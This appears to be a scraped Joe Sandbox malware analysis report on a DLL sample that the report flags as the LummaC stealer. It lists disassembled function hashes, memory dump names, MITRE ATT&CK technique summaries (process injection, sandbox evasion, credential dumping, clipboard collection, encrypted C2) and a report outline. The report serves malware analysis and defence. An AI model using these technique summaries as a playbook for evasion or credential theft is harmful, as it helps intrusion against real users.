Instruction Fuzzy Hash: A721C0BAE04319CFCB048F69D890A9A7BF0FB09314F1448B9E945D7211E7729812CB95

Function 75A9E7B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75ee98e22ae4041211a9e087b2deed86515f2aa3157dff0819058086ad3c349a
Instruction ID: 6d5542680333c3ac2243e0dda8a48edd3461ef509d8029e2188d6c0c1acdb5b4
Opcode Fuzzy Hash: 75ee98e22ae4041211a9e087b2deed86515f2aa3157dff0819058086ad3c349a
Instruction Fuzzy Hash: 3301D4F970832187D7148E5495D0F27B6F97FA9654F04883CD8278B30AEB75E804C2EA

Function 0289C6B5 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.2168024717.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Offset: 02898000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_289b000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40dbb3cc54781d3beb6fce452ee4acc133580a7d67dbaeb4b1dd6f867d6a8c1
Instruction ID: e4393b4e2aebe73ccd072d3b6f1b7c834681467d79f5070d9552cac82e4d818d
Opcode Fuzzy Hash: a40dbb3cc54781d3beb6fce452ee4acc133580a7d67dbaeb4b1dd6f867d6a8c1
Instruction Fuzzy Hash: 0DF0A89A54E3C06FC70367B85CA25903FF1AE2B24072F58C7C0C48F0A7E11A4A5EE762

Function 0289C6B5 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.2168024717.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Offset: 0289B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_289b000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40dbb3cc54781d3beb6fce452ee4acc133580a7d67dbaeb4b1dd6f867d6a8c1
Instruction ID: e4393b4e2aebe73ccd072d3b6f1b7c834681467d79f5070d9552cac82e4d818d
Opcode Fuzzy Hash: a40dbb3cc54781d3beb6fce452ee4acc133580a7d67dbaeb4b1dd6f867d6a8c1
Instruction Fuzzy Hash: 0DF0A89A54E3C06FC70367B85CA25903FF1AE2B24072F58C7C0C48F0A7E11A4A5EE762

Function 75A9BA10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

57, xrefs: 75A9BB53
`c, xrefs: 75A9BC99
/~, xrefs: 75A9C2D8

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: /~$`c$57
API String ID: 0-484455979
Opcode ID: 96e7c274275d99e4ec17ac4e49077f92bcee7eff8639745291c6788825678c52
Instruction ID: 49d857655e00bd6a99906ab2f53ba9ef50eef8606c5a29d822dbfab0c5569aa0
Opcode Fuzzy Hash: 96e7c274275d99e4ec17ac4e49077f92bcee7eff8639745291c6788825678c52
Instruction Fuzzy Hash: 38B1DDB5D0032CDBDB249F65DC52B9EBBB5FB06304F1041A9D44AAB244DB344A86CFA2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report msvcp110.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
msvcp110.dll

Function 75A7EC20 Relevance: 20.4, Strings: 16, Instructions: 397
COMMON

Function 75A979B0 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 506
COMMON

Function 75A7CF90 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186
threadCOMMON

Function 75AABB70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78
comCOMMON

Function 75A7E1A0 Relevance: 6.8, Strings: 5, Instructions: 540
COMMON

Function 75A8104F Relevance: 2.9, APIs: 2, Instructions: 377
COMMON

Function 75A8D7F8 Relevance: 1.9, APIs: 1, Instructions: 413
COMMON

Function 75A80CA0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 306
COMMON